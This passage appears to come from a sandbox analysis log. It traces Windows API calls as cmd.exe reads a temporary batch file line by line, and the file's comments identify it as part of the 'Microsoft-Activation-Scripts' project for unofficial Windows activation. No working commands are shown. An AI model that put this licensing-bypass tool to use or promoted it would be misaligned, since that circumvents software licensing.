| out: lpDistanceToMoveHigh=0x0) returned 0x50 [0174.456] GetProcessHeap () returned 0x19a8f1e0000 [0174.456] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.456] GetProcessHeap () returned 0x19a8f1e0000 [0174.457] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.457] _tell (_FileHandle=3) returned 80 [0174.457] _close (_FileHandle=3) returned 0 [0174.457] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.457] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.458] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.458] SetFilePointer (in: hFile=0x88, lDistanceToMove=80, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0174.458] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.458] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x50 [0174.458] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.458] SetFilePointer (in: hFile=0x88, lDistanceToMove=82, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0174.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ncho off\r\nisableDelayedExpansion\r\n") returned 2 [0174.458] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.458] GetFileType (hFile=0x88) returned 0x1 [0174.458] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.458] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0174.458] GetProcessHeap () returned 0x19a8f1e0000 [0174.458] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.458] GetProcessHeap () returned 0x19a8f1e0000 [0174.459] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.459] _tell (_FileHandle=3) returned 82 [0174.459] _close (_FileHandle=3) returned 0 [0174.459] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.460] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.460] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.460] SetFilePointer (in: hFile=0x88, lDistanceToMove=82, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0174.460] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.460] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x52 [0174.460] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.460] SetFilePointer (in: hFile=0x88, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0174.460] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ncho off\r\nisableDelayedExpansion\r\n") returned 2 [0174.460] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.460] GetFileType (hFile=0x88) returned 0x1 [0174.460] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.460] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0174.460] GetProcessHeap () returned 0x19a8f1e0000 [0174.460] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.460] GetProcessHeap () returned 0x19a8f1e0000 [0174.461] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.461] _tell (_FileHandle=3) returned 84 [0174.461] _close (_FileHandle=3) returned 0 [0174.461] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.462] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.462] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.462] SetFilePointer (in: hFile=0x88, lDistanceToMove=84, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0174.462] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.462] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x54 [0174.462] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.462] SetFilePointer (in: hFile=0x88, lDistanceToMove=166, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0174.462] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: For command line switches, check mass grave[.]dev/command_line_switches.html\r\n", cbMultiByte=82, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: For command line switches, check mass grave[.]dev/command_line_switches.html\r\n") returned 82 [0174.462] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.462] GetFileType (hFile=0x88) returned 0x1 [0174.462] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.462] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0174.462] GetProcessHeap () returned 0x19a8f1e0000 [0174.462] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.463] GetProcessHeap () returned 0x19a8f1e0000 [0174.463] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.464] _tell (_FileHandle=3) returned 166 [0174.464] _close (_FileHandle=3) returned 0 [0174.464] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.464] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.465] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.465] SetFilePointer (in: hFile=0x88, lDistanceToMove=166, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0174.465] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.465] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0174.465] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.465] SetFilePointer (in: hFile=0x88, lDistanceToMove=251, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb [0174.465] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: If you want to better understand script, read from MAS separate files version. \r\n", cbMultiByte=85, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: If you want to better understand script, read from MAS separate files version. \r\n") returned 85 [0174.465] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.465] GetFileType (hFile=0x88) returned 0x1 [0174.465] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.465] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb [0174.465] GetProcessHeap () returned 0x19a8f1e0000 [0174.465] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.465] GetProcessHeap () returned 0x19a8f1e0000 [0174.466] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.467] _tell (_FileHandle=3) returned 251 [0174.467] _close (_FileHandle=3) returned 0 [0174.467] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.467] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.467] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.467] SetFilePointer (in: hFile=0x88, lDistanceToMove=251, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfb [0174.467] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.467] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfb [0174.467] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.467] SetFilePointer (in: hFile=0x88, lDistanceToMove=253, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0174.468] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n If you want to better understand script, read from MAS separate files version. \r\n") returned 2 [0174.468] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.468] GetFileType (hFile=0x88) returned 0x1 [0174.468] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.468] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0174.468] GetProcessHeap () returned 0x19a8f1e0000 [0174.468] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.468] GetProcessHeap () returned 0x19a8f1e0000 [0174.468] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.468] _tell (_FileHandle=3) returned 253 [0174.468] _close (_FileHandle=3) returned 0 [0174.469] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.469] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.469] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.469] SetFilePointer (in: hFile=0x88, lDistanceToMove=253, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0174.471] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.471] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0174.471] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.471] SetFilePointer (in: hFile=0x88, lDistanceToMove=255, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff [0174.471] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n If you want to better understand script, read from MAS separate files version. \r\n") returned 2 [0174.471] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.471] GetFileType (hFile=0x88) returned 0x1 [0174.471] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.472] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff [0174.472] GetProcessHeap () returned 0x19a8f1e0000 [0174.472] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.472] GetProcessHeap () returned 0x19a8f1e0000 [0174.472] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.472] _tell (_FileHandle=3) returned 255 [0174.472] _close (_FileHandle=3) returned 0 [0174.472] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.473] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.473] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.473] SetFilePointer (in: hFile=0x88, lDistanceToMove=255, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xff [0174.473] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.473] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xff [0174.473] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.473] SetFilePointer (in: hFile=0x88, lDistanceToMove=335, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14f [0174.473] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::============================================================================\r\n", cbMultiByte=80, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::============================================================================\r\nn. \r\n") returned 80 [0174.473] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.473] GetFileType (hFile=0x88) returned 0x1 [0174.473] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.473] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14f [0174.473] GetProcessHeap () returned 0x19a8f1e0000 [0174.473] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.474] GetProcessHeap () returned 0x19a8f1e0000 [0174.474] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.474] _tell (_FileHandle=3) returned 335 [0174.474] _close (_FileHandle=3) returned 0 [0174.474] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.474] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.475] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.475] SetFilePointer (in: hFile=0x88, lDistanceToMove=335, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x14f [0174.475] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.475] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x14f [0174.475] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.475] SetFilePointer (in: hFile=0x88, lDistanceToMove=339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x153 [0174.475] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::\r\n", cbMultiByte=4, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::\r\n==========================================================================\r\nn. \r\n") returned 4 [0174.475] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.475] GetFileType (hFile=0x88) returned 0x1 [0174.475] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.475] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x153 [0174.475] GetProcessHeap () returned 0x19a8f1e0000 [0174.475] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.475] GetProcessHeap () returned 0x19a8f1e0000 [0174.476] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.476] _tell (_FileHandle=3) returned 339 [0174.476] _close (_FileHandle=3) returned 0 [0174.476] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.476] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.476] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.476] SetFilePointer (in: hFile=0x88, lDistanceToMove=339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x153 [0174.477] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.477] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x153 [0174.477] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.477] SetFilePointer (in: hFile=0x88, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0174.477] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: This script is a part of 'Microsoft-Activation-Scripts' (MAS) project.\r\n", cbMultiByte=77, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: This script is a part of 'Microsoft-Activation-Scripts' (MAS) project.\r\n=\r\nn. \r\n") returned 77 [0174.477] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.477] GetFileType (hFile=0x88) returned 0x1 [0174.477] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.477] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0174.477] GetProcessHeap () returned 0x19a8f1e0000 [0174.477] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.477] GetProcessHeap () returned 0x19a8f1e0000 [0174.478] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.478] _tell (_FileHandle=3) returned 416 [0174.478] _close (_FileHandle=3) returned 0 [0174.478] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.478] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.479] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.479] SetFilePointer (in: hFile=0x88, lDistanceToMove=416, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0174.479] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.479] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a0 [0174.479] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.479] SetFilePointer (in: hFile=0x88, lDistanceToMove=420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a4 [0174.479] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::\r\n", cbMultiByte=4, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::\r\n This script is a part of 'Microsoft-Activation-Scripts' (MAS) project.\r\n=\r\nn. \r\n") returned 4 [0174.479] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.479] GetFileType (hFile=0x88) returned 0x1 [0174.479] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.479] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a4 [0174.479] GetProcessHeap () returned 0x19a8f1e0000 [0174.479] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.479] GetProcessHeap () returned 0x19a8f1e0000 [0174.480] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.480] _tell (_FileHandle=3) returned 420 [0174.480] _close (_FileHandle=3) returned 0 [0174.480] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.480] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.480] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.480] SetFilePointer (in: hFile=0x88, lDistanceToMove=420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1a4 [0174.481] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.481] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1a4 [0174.481] ReadFile (in: hFile=0x88, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0174.481] SetFilePointer (in: hFile=0x88, lDistanceToMove=453, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c5 [0174.481] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Homepage: mass grave[.]dev\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Homepage: mass grave[.]dev\r\ncrosoft-Activation-Scripts' (MAS) project.\r\n=\r\nn. \r\n") returned 33 [0174.481] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.481] GetFileType (hFile=0x88) returned 0x1 [0174.481] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.481] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c5 [0174.481] GetProcessHeap () returned 0x19a8f1e0000 [0174.481] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f1fb800 [0174.481] GetProcessHeap () returned 0x19a8f1e0000 [0174.482] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fb800) returned 1 [0174.482] _tell (_FileHandle=3) returned 453 [0174.482] _close (_FileHandle=3) returned 0 [0174.482] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x88 [0174.482] _open_osfhandle (_OSFileHandle=0x88, _Flags=8) returned 3 [0174.482] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.482] SetFilePointer (in: hFile=0x88, lDistanceToMove=453, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c5 [0174.483] _get_osfhandle (_FileHandle=3) returned 0x88 [0174.483] SetFilePointer (in: hFile=0x88, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1c5 [0174.483] ReadFile 